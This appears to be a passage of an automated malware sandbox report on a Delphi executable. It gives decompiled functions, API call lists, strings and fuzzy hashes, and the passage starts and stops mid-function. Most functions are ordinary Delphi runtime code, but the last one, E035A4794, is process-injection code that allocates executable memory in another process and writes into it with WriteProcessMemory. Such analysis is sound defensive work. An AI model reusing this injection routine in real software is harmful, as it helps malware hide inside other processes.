        if(RegQueryValueExA(_v12, &_v289, 0, 0, &_v22, &_v28) != 0 && RegQueryValueExA(_v12, 0x35959f0, 0, 0, &_v22, &_v28) != 0) {
            _v22 = 0;
        }
        _v18 = 0;
        _pop(_t104);
        *[fs:eax] = _t104;
        _push(0x3595890);
        return RegCloseKey(_v12);
    } else {
        _t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019, &_v12); // executed
        if(_t61 == 0) {
            goto L3;
        } else {
            _t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019, &_v12); // executed
            if(_t63 != 0) {
                lstrcpynA( &_v289, _v8, 0x105);
                GetLocaleInfoA(GetThreadLocale(), 3, &_v17, 5);
                _t112 = 0;
                if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                    _t99 = &(( &_v289)[lstrlenA( &_v289)]);
                    L12:
                    if( *_t99 != 0x2e && _t99 != &_v289) {
                        _t99 = _t99 - 1;
                        goto L12;
                    }
                    _t74 = &_v289;
                    if(_t99 != _t74) {
                        _t100 = &(_t99[1]);
                        if(_v22 != 0) {
                            lstrcpynA(_t100, &_v22, 0x105 - _t100 - _t74);
                            _t112 = LoadLibraryExA( &_v289, 0, "true");
                        }
                        if(_t112 == 0 && _v17 != 0) {
                            lstrcpynA(_t100, &_v17, 0x105 - _t100 - &_v289);
                            _t112 = LoadLibraryExA( &_v289, 0, "true");
                            if(_t112 == 0) {
                                _v15 = 0;
                                lstrcpynA(_t100, &_v17, 0x105 - _t100 - &_v289);
                                _t112 = LoadLibraryExA( &_v289, 0, "true");
                            }
                        }
                    }
                }
                return _t112;
            } else {
                goto L3;
            }
        }
    }
}

                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,03590000,035A8790), ref: 035957A0
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,03590000,035A8790), ref: 035957BE
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,03590000,035A8790), ref: 035957DC
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 035957FA
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,03595889,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03595843
                                                                            • RegQueryValueExA.ADVAPI32(?,035959F0,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,03595889,?,80000001), ref: 03595861
                                                                            • RegCloseKey.ADVAPI32(?,03595890,00000000,?,?,00000000,03595889,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03595883
                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 035958A0
                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 035958AD
                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 035958B3
                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 035958DE
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03595925
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03595935
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0359595D
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0359596D
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 03595993
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?), ref: 035959A3
                                                                            Strings
                                                                            • Software\Borland\Locales , xrefs: 035957B4, 035957D2
                                                                            • Software\Borland\Delphi\Locales , xrefs: 035957F0
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                            • API String ID: 1759228003-2375825460
                                                                            • Opcode ID: d551439c07bc57ea5b78872035c7fc67d6917aed912681b89cc1593768a13f77
                                                                            • Instruction ID: 16f6051be00e6bd08f50994a285147eb0eeb0868e3b23d2a38377ce3780333e3
                                                                            • Opcode Fuzzy Hash: d551439c07bc57ea5b78872035c7fc67d6917aed912681b89cc1593768a13f77
                                                                            • Instruction Fuzzy Hash: 9651D875A0031E7EFF22D6A4EC45FEFB7BCAB45740F5404A3AA04EA191E6749B44CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 95%
                                                                                                                                  E0045603C(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) { 				struct HWND__* _v8; 				struct HWND__* _v12; 				void* __ebx; 				void* __esi; 				void* __ebp; 				signed int _t161; 				struct HWND__* _t162; 				struct HWND__* _t163; 				void* _t166; 				struct HWND__* _t176; 				struct HWND__* _t185; 				struct HWND__* _t188; 				struct HWND__* _t189; 				struct HWND__* _t191; 				struct HWND__* _t197; 				struct HWND__* _t199; 				struct HWND__* _t202; 				struct HWND__* _t205; 				struct HWND__* _t206; 				struct HWND__* _t216; 				struct HWND__* _t217; 				struct HWND__* _t222; 				struct HWND__* _t224; 				struct HWND__* _t227; 				struct HWND__* _t231; 				struct HWND__* _t239; 				struct HWND__* _t248; 				struct HWND__* _t252; 				struct HWND__* _t254; 				struct HWND__* _t255; 				struct HWND__* _t267; 				intOrPtr _t270; 				struct HWND__* _t273; 				struct HWND__* _t274; 				struct HWND__* _t276; 				intOrPtr* _t277; 				struct HWND__* _t285; 				struct HWND__* _t287; 				void* _t307; 				signed int _t309; 				struct HWND__* _t315; 				struct HWND__* _t316; 				struct HWND__* _t317; 				void* _t318; 				intOrPtr _t342; 				struct HWND__* _t346; 				intOrPtr _t368; 				void* _t372; 				struct HWND__* _t377; 				void* _t378; 				void* _t379; 				intOrPtr _t380;  				_t318 = __ecx; 				_push(_t372); 				_v12 = __edx; 				_v8 = __eax; 				_push(_t379); 				_push(0x456706); 				_push( *[fs:edx]); 				 *[fs:edx] = _t380; 				 *(_v12 + 0xc) = 0; 				_t307 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xb0)) + 8)) - 1; 				if(_t307 < 0) { 					L5: 					E00455EF0(_v8, _t318, _v12); 					_t309 =  *_v12; 					_t161 = _t309; 					__eflags = _t161 - 0x53; 					if(__eflags > 0) { 						__eflags = _t161 - 0xb017; 						if(__eflags > 0) { 							__eflags = _t161 - 0xb020; 							if(__eflags > 0) { 								_t162 = _t161 - 0xb031; 								
__eflags = _t162; 								if(_t162 == 0) { 									_t163 = _v12; 									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1; 									if( *((intOrPtr*)(_t163 + 4)) != 1) { 										 *(_v8 + 0xb8) =  *(_v12 + 8); 									} else { 										 *(_v12 + 0xc) =  *(_v8 + 0xb8); 									} 									L105: 									_t166 = 0; 									_pop(_t342); 									 *[fs:eax] = _t342; 									goto L106; 								} 								__eflags = _t162 + 0xfffffff2 - 2; 								if(_t162 + 0xfffffff2 - 2 < 0) { 									 *(_v12 + 0xc) = E00458554(_v8,  *(_v12 + 8), _t309) & 0x0000007f; 								} else { 									L104: 									E00455FB4(_t379); // executed 								} 								goto L105; 							} 							if(__eflags == 0) { 								_t176 = _v12; 								__eflags =  *(_t176 + 4); 								if( *(_t176 + 4) != 0) { 									E00456E20(_v8, _t318,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4))); 								} else { 									E00456DC4(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4))); 								} 								goto L105; 							} 							_t185 = _t161 - 0xb01a; 							__eflags = _t185; 							if(_t185 == 0) { 								_t188 = IsIconic( *(_v8 + 0x30)); 								__eflags = _t188; 								if(_t188 == 0) { 									_t189 = GetFocus(); 									_t346 = _v8; 									__eflags = _t189 -  *((intOrPtr*)(_t346 + 0x30)); 									if(_t189 ==  *((intOrPtr*)(_t346 + 0x30))) { 										_t191 = E0044CB68(0); 										__eflags = _t191; 										if(_t191 != 0) { 											SetFocus(_t191); 										} 									} 								} 								goto L105; 							} 							__eflags = _t185 == 5; 							if(_t185 == 5) { 								L93: 								E00457374(_v8,  *(_v12 + 8),  *(_v12 + 4) & 0x0000ffff); 								goto L105; 							} else { 								goto L104; 							} 						} 						if(__eflags == 0) { 							_t197 =  *(_v8 + 0x44); 							__eflags = _t197; 							if(_t197 != 0) { 								_t311 = _t197; 								_t199 = E004423F8(_t197); 								__eflags = _t199; 								if(_t199 != 0) { 									_t202 = IsWindowEnabled(E004423F8(_t311)); 									__eflags = 
_t202; 									if(_t202 != 0) { 										_t205 = IsWindowVisible(E004423F8(_t311)); 										__eflags = _t205; 										if(_t205 != 0) { 											 *0x4626c0 = 0; 											_t206 = GetFocus(); 											SetFocus(E004423F8(_t311)); 											E0043BC9C(_t311,  *(_v12 + 4), 0x112,  *(_v12 + 8)); 											SetFocus(_t206); 											 *0x4626c0 = 1; 											 *(_v12 + 0xc) = 1; 										} 									} 								} 							} 							goto L105; 						} 						__eflags = _t161 - 0xb000; 						if(__eflags > 0) { 							_t216 = _t161 - 0xb001; 							__eflags = _t216; 							if(_t216 == 0) { 								_t217 = _v8; 								__eflags =  *((short*)(_t217 + 0x132)); 								if( *((short*)(_t217 + 0x132)) != 0) { 									 *((intOrPtr*)(_v8 + 0x130))(); 								} 								goto L105; 							} 							__eflags = _t216 == 0x15; 							if(_t216 == 0x15) { 								_t222 = E00456B84(_v8, _t318, _v12); 								__eflags = _t222; 								if(_t222 != 0) { 									 *(_v12 + 0xc) = 1; 								} 								goto L105; 							} else { 								goto L104; 							} 						} 						if(__eflags == 0) { 							_t224 = _v8; 							__eflags =  *((short*)(_t224 + 0x13a)); 							if( *((short*)(_t224 + 0x13a)) != 0) { 								 *((intOrPtr*)(_v8 + 0x138))(); 							} 							goto L105; 						} 						_t227 = _t161 - 0x112; 						__eflags = _t227; 						if(_t227 == 0) { 							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020; 							__eflags = _t231; 							if(_t231 == 0) { 								E0045676C(_v8); 							} else { 								__eflags = _t231 == 0x100; 								if(_t231 == 0x100) { 									E00456830(_v8); 								} else { 									E00455FB4(_t379); 								} 							} 							goto L105; 						} 						_t239 = _t227 + 0xffffffe0 - 7; 						__eflags = _t239; 						if(_t239 < 0) { 							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t309 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8)); 							goto L105; 						} 						__eflags = _t239 == 0x1e1; 						if(_t239 == 0x1e1) { 							E0042DCD8(E0042DB74()); 							goto L105; 						} else { 					
		goto L104; 						} 					} 					if(__eflags == 0) { 						goto L93; 					} 					__eflags = _t161 - 0x14; 					if(__eflags > 0) { 						__eflags = _t161 - 0x1d; 						if(__eflags > 0) { 							_t248 = _t161 - 0x37; 							__eflags = _t248; 							if(_t248 == 0) { 								 *(_v12 + 0xc) = E00456750(_v8); 								goto L105; 							} 							__eflags = _t248 == 0x13; 							if(_t248 == 0x13) { 								_t252 = _v12; 								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t252 + 8)))) - 0xde534454; 								if( *((intOrPtr*)( *((intOrPtr*)(_t252 + 8)))) == 0xde534454) { 									_t254 = _v8; 									__eflags =  *((char*)(_t254 + 0xa6)); 									if( *((char*)(_t254 + 0xa6)) != 0) { 										_t255 = _v8; 										__eflags =  *(_t255 + 0xa8); 										if( *(_t255 + 0xa8) != 0) { 											 *(_v12 + 0xc) = 0; 										} else { 											_t315 = E0040DDC0("vcltest3.dll", _t309, 0x8000); 											 *(_v8 + 0xa8) = _t315; 											__eflags = _t315; 											if(_t315 == 0) { 												 *(_v12 + 0xc) = GetLastError(); 												 *(_v8 + 0xa8) = 0; 											} else { 												 *(_v12 + 0xc) = 0; 												_t377 = GetProcAddress( *(_v8 + 0xa8), "RegisterAutomation"); 												_t316 = _t377; 												__eflags = _t377; 												if(_t377 != 0) { 													_t267 =  *(_v12 + 8); 													_t316->i( *((intOrPtr*)(_t267 + 4)),  *((intOrPtr*)(_t267 + 8))); 												} 											} 										} 									} 								} 								goto L105; 							} else { 								goto L104; 							} 						} 						if(__eflags == 0) { 							_t270 =  *0x466584; // 0x27c66a0 							E00455244(_t270); 							E00455FB4(_t379); 							goto L105; 						} 						_t273 = _t161 - 0x16; 						__eflags = _t273; 						if(_t273 == 0) { 							_t274 = _v12; 							__eflags =  *(_t274 + 4); 							if( *(_t274 + 4) != 0) { 								E0040D818(); 								E00404648(); 							} 							goto L105; 						} 						_t276 = _t273 - 4; 						__eflags = _t276; 						if(_t276 == 0) { 							_t277 =  *0x462ed4; // 
0x4664ec 							E00447478( *_t277, _t318,  *(_v12 + 4)); 							E00455F48(_v8, _t309, _t318, _v12, _t372); 							E00455FB4(_t379); 							goto L105; 						} 						__eflags = _t276 == 2; 						if(_t276 == 2) { 							E00455FB4(_t379); 							_t285 = _v12; 							__eflags =  *((intOrPtr*)(_t285 + 4)) - 1; 							asm("sbb eax, eax"); 							 *((char*)(_v8 + 0xa5)) = _t285 + 1; 							_t287 = _v12; 							__eflags =  *(_t287 + 4); 							if( *(_t287 + 4) == 0) { 								E00455CBC(); 								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0); 							} else { 								E00455D1C(_v8); 								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0); 							} 							goto L105; 						} else { 							goto L104; 						} 					} 					if(__eflags == 0) { 						 *_v12 = 0x27; 						E00455FB4(_t379); 						goto L105; 					} 					__eflags = _t161 - 0x11; 					if(_t161 > 0x11) { 						goto L104; 					} 					switch( *((intOrPtr*)(_t161 * 4 +  &M004560E0))) { 						case 0: 							0 = E0042048C(0, __ebx, __edi, __esi); 							goto L105; 						case 1: 							goto L104; 						case 2: 							_push(0); 							_push(0); 							_push(0xb01a); 							_v8 =  *(_v8 + 0x30); 							_push( *(_v8 + 0x30)); 							L0040717C(); 							__eax = E00455FB4(__ebp); 							goto L105; 						case 3: 							__eax = _v12; 							__eflags =  *(__eax + 4); 							if( *(__eax + 4) == 0) { 								__eax = E00455FB4(__ebp); 								__eax = _v8; 								__eflags =  *(__eax + 0xb4); 								if( *(__eax + 0xb4) == 0) { 									__eflags =  *0x4626d4; 									if( *0x4626d4 == 0) { 										__eax = _v8; 										__eax =  *(_v8 + 0x30); 										__eax = E0044CA08( *(_v8 + 0x30), __ebx, __edi, __esi); 										__edx = _v8; 										 *(_v8 + 0xb4) = __eax; 									} 								} 								_v8 = L00455CC4(); 							} else { 								__eflags =  *0x4626d4; 								if( *0x4626d4 == 0) { 									_v8 = E00455D1C(_v8); 									__eax = _v8; 									__eax =  *(_v8 + 0xb4); 									__eflags = __eax; 									if(__eax != 0) { 										__eax = _v8; 
										__edx = 0; 										__eflags = 0; 										 *(_v8 + 0xb4) = 0; 									} 								} 								__eax = E00455FB4(__ebp); 							} 							goto L105; 						case 4: 							__eax = _v8; 							__eax =  *(_v8 + 0x30); 							_push(__eax); 							L004070DC(); 							__eflags = __eax; 							if(__eax == 0) { 								__eax = E00455FB4(__ebp); 							} else { 								__eax = E00455FF0(__ebp); 							} 							goto L105; 						case 5: 							__eax = _v8; 							__eax =  *(_v8 + 0x44); 							__eflags = __eax; 							if(__eax != 0) { 								__eax = E004532AC(__eax, __ecx); 							} 							goto L105; 						case 6: 							__eax = _v12; 							 *(_v12 + 0xc) = 1; 							goto L105; 					} 				} else { 					_t317 = _t307 + 1; 					_t378 = 0; 					L2: 					L2: 					if( *((intOrPtr*)(E0041A80C( *((intOrPtr*)(_v8 + 0xb0)), _t378)))() == 0) { 						goto L4; 					} else { 						_t166 = 0; 						_pop(_t368); 						 *[fs:eax] = _t368; 					} 					L106: 					return _t166; 					L4: 					_t378 = _t378 + 1; 					_t317 = _t317 - 1; 					__eflags = _t317; 					if(_t317 != 0) { 						goto L2; 					} 					goto L5; 				} 			}                        

                                                                            0x0045613f
                                                                            0x004566ad
                                                                            0x004566b4
                                                                            0x004566bf
                                                                            0x004566c5
                                                                            0x00000000
                                                                            0x004566ca
                                                                            0x00456145
                                                                            0x00456148
                                                                            0x004562cd
                                                                            0x004562d3
                                                                            0x004562d6
                                                                            0x004562da
                                                                            0x004562e0
                                                                            0x004562e6
                                                                            0x004562e9
                                                                            0x004562ed
                                                                            0x00456314
                                                                            0x00456329
                                                                            0x004562ef
                                                                            0x004562f2
                                                                            0x00456307
                                                                            0x00456307
                                                                            0x00000000
                                                                            0x0045614e
                                                                            0x00000000
                                                                            0x0045614e
                                                                            0x00456148
                                                                            0x004560ca
                                                                            0x00456286
                                                                            0x0045628d
                                                                            0x00000000
                                                                            0x00456292
                                                                            0x004560d0
                                                                            0x004560d3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004560d9
                                                                            0x00000000
                                                                            0x004566ee
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004562ab
                                                                            0x004562ad
                                                                            0x004562af
                                                                            0x004562b7
                                                                            0x004562ba
                                                                            0x004562bb
                                                                            0x004562c1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00456333
                                                                            0x00456336
                                                                            0x0045633a
                                                                            0x00456377
                                                                            0x0045637d
                                                                            0x00456380
                                                                            0x00456387
                                                                            0x00456389
                                                                            0x00456390
                                                                            0x00456392
                                                                            0x00456395
                                                                            0x00456398
                                                                            0x0045639d
                                                                            0x004563a0
                                                                            0x004563a0
                                                                            0x00456390
                                                                            0x004563a9
                                                                            0x0045633c
                                                                            0x0045633c
                                                                            0x00456343
                                                                            0x00456348
                                                                            0x0045634d
                                                                            0x00456350
                                                                            0x00456356
                                                                            0x00456358
                                                                            0x0045635f
                                                                            0x00456362
                                                                            0x00456362
                                                                            0x00456364
                                                                            0x00456364
                                                                            0x00456358
                                                                            0x0045636b
                                                                            0x00456370
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0045625b
                                                                            0x0045625e
                                                                            0x00456261
                                                                            0x00456262
                                                                            0x00456267
                                                                            0x00456269
                                                                            0x00456278
                                                                            0x0045626b
                                                                            0x0045626c
                                                                            0x00456271
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00456243
                                                                            0x00456246
                                                                            0x00456249
                                                                            0x0045624b
                                                                            0x00456251
                                                                            0x00456251
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004563fb
                                                                            0x004563fe
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00456072
                                                                            0x00456072
                                                                            0x00456073
                                                                            0x00000000
                                                                            0x00456075
                                                                            0x00456091
                                                                            0x00000000
                                                                            0x00456093
                                                                            0x00456093
                                                                            0x00456095
                                                                            0x00456098
                                                                            0x00456098
                                                                            0x0045671b
                                                                            0x00456721
                                                                            0x004560a0
                                                                            0x004560a0
                                                                            0x004560a1
                                                                            0x004560a1
                                                                            0x004560a2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004560a2

                                                                            Strings
                                                                            • vcltest3.dll , xrefs: 0045643D
                                                                            • dF , xrefs: 004566AD
                                                                            • RegisterAutomation , xrefs: 0045645E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RegisterAutomation$vcltest3.dll$dF
                                                                            • API String ID: 0-2619585711
                                                                            • Opcode ID: bebbeda00556289de3349cc0c43b19427dd01e6f62d31d66b9211dfcce096cd8
                                                                            • Instruction ID: c862d983367047c7d83d43d7369f119c2f1ed98460a64e58c2bee91e03f6acd7
                                                                            • Opcode Fuzzy Hash: bebbeda00556289de3349cc0c43b19427dd01e6f62d31d66b9211dfcce096cd8
                                                                            • Instruction Fuzzy Hash: D0E18074A00204EFD700DF69C585A5EB7F1AF08315FA681AAEC049B367C739EE49DB09
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E00405F8C() {
                                                                                void* _t32;
                                                                                struct HINSTANCE__* _t39;
                                                                                struct HINSTANCE__* _t46;
                                                                                CHAR* _t56;
                                                                                CHAR* _t57;
                                                                                struct HINSTANCE__* _t64;
                                                                                void* _t66;

                                                                                lstrcpynA(_t66 - 0x11d, *(_t66 - 4), 0x105);
                                                                                GetLocaleInfoA(GetThreadLocale(), 3, _t66 - 0xd, 5);
                                                                                _t64 = 0;
                                                                                if( *(_t66 - 0x11d) == 0 || *(_t66 - 0xd) == 0 && *(_t66 - 0x12) == 0) {
                                                                                    L14:
                                                                                    return _t64;
                                                                                } else {
                                                                                    _t56 = &((_t66 - 0x11d)[lstrlenA(_t66 - 0x11d)]);
                                                                                    L5:
                                                                                    if( *_t56 != 0x2e && _t56 != _t66 - 0x11d) {
                                                                                        _t56 = _t56 - 1;
                                                                                        goto L5;
                                                                                    }
                                                                                    _t32 = _t66 - 0x11d;
                                                                                    if(_t56 != _t32) {
                                                                                        _t57 = &(_t56[1]);
                                                                                        if( *(_t66 - 0x12) != 0) {
                                                                                            lstrcpynA(_t57, _t66 - 0x12, 0x105 - _t57 - _t32);
                                                                                            _t64 = LoadLibraryExA(_t66 - 0x11d, 0, "true");
                                                                                        }
                                                                                        if(_t64 == 0 && *(_t66 - 0xd) != 0) {
                                                                                            lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
                                                                                            _t39 = LoadLibraryExA(_t66 - 0x11d, 0, "true"); // executed
                                                                                            _t64 = _t39;
                                                                                            if(_t64 == 0) {
                                                                                                *((char*)(_t66 - 0xb)) = 0;
                                                                                                lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
                                                                                                _t46 = LoadLibraryExA(_t66 - 0x11d, 0, "true"); // executed
                                                                                                _t64 = _t46;
                                                                                            }
                                                                                        }
                                                                                    }
                                                                                    goto L14;
                                                                                }
                                                                            }


                                                                            APIs
                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405F9C
                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405FA9
                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405FAF
                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405FDA
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406021
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406031
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406059
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406069
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0040608F
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?), ref: 0040609F
                                                                            Strings
                                                                            • Software\Borland\Locales , xrefs: 00405EB0, 00405ECE
                                                                            • Software\Borland\Delphi\Locales , xrefs: 00405EEC
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                            • API String ID: 1599918012-2375825460
                                                                            • Opcode ID: 3b076b2b373c45a9159bfb3f8682f777772ce63c1bbea00a07b9ef255dfea311
                                                                            • Instruction ID: 056191be2cc99d761454d3f3497d73c48898f7ba8829eff3fe46ba9af11a18cc
                                                                            • Opcode Fuzzy Hash: 3b076b2b373c45a9159bfb3f8682f777772ce63c1bbea00a07b9ef255dfea311
                                                                            • Instruction Fuzzy Hash: 44314D71E4021D2AFB26D6B89C46FDF7AED8B44384F4441F7A605F61C2E67C8E848B54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 81%
                                                                            E035A4794(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                intOrPtr _v12;
                                                                                long _v20;
                                                                                void* _v24;
                                                                                void* _v28;
                                                                                intOrPtr _v32;
                                                                                char _v33;
                                                                                long _v40;
                                                                                intOrPtr _v44;
                                                                                void* _v48;
                                                                                void* _t35;
                                                                                void* _t39;
                                                                                void* _t46;
                                                                                void* _t52;
                                                                                void* _t54;
                                                                                intOrPtr _t61;
                                                                                intOrPtr _t63;
                                                                                intOrPtr _t64;
                                                                                void* _t71;
                                                                                void* _t73;
                                                                                void* _t76;
                                                                                void* _t86;

                                                                                _t86 = __fp0;
                                                                                _v32 = __edx;
                                                                                _v28 = __eax;
                                                                                _t61 = *0x35a40a8; // 0x35a40ac
                                                                                E03594D4C( &_v24, _t61);
                                                                                _push(_t76);
                                                                                _push(0x35a4894);
                                                                                _push( *[fs:eax]);
                                                                                *[fs:eax] = _t76 + 0xffffffd4;
                                                                                _v33 = 0;
                                                                                _t71 = *((intOrPtr*)(_v32 + 0x3c)) + _v32;
                                                                                _t73 = 0x72000000;
                                                                                do {
                                                                                    _t73 = _t73 + 0x80000;
                                                                                    _t35 = VirtualAlloc( *((intOrPtr*)(_t71 + 0x34)) + _t73, *(_t71 + 0x50), 0x3000, 0x40); // executed
                                                                                    _t54 = _t35;
                                                                                    if(_t54 != 0) {
                                                                                        VirtualFree(_t54, 0, 0x8000); // executed
                                                                                        _t52 = VirtualAllocEx(_v28, *((intOrPtr*)(_t71 + 0x34)) + _t73, *(_t71 + 0x50), 0x3000, 0x40); // executed
                                                                                        _t54 = _t52;
                                                                                    }
                                                                                } while (_t54 == 0 && _t73 <= 0x74000000);
                                                                                E035A4C2C(_v28, _t54, _v32, _t54, _t71, _t73, _t86, &_v24); // executed
                                                                                _t39 = _v24;
                                                                                if(_t39 != 0) {
                                                                                    _v48 = _t39;
                                                                                    _v44 = _v12;
                                                                                    WriteProcessMemory(_v28, _t54, _t39, _v20, &_v40); // executed
                                                                                    _t46 = E035A45EC(_v28, &_v48, E035A476C, 0, 8); // executed
                                                                                    if(_t46 != 0) {
                                                                                        _v33 = 1;
                                                                                    }
                                                                                }
                                                                                _pop(_t63);
                                                                                *[fs:eax] = _t63;
                                                                                _push(E035A489B);
                                                                                _t64 = *0x35a40a8; // 0x35a40ac
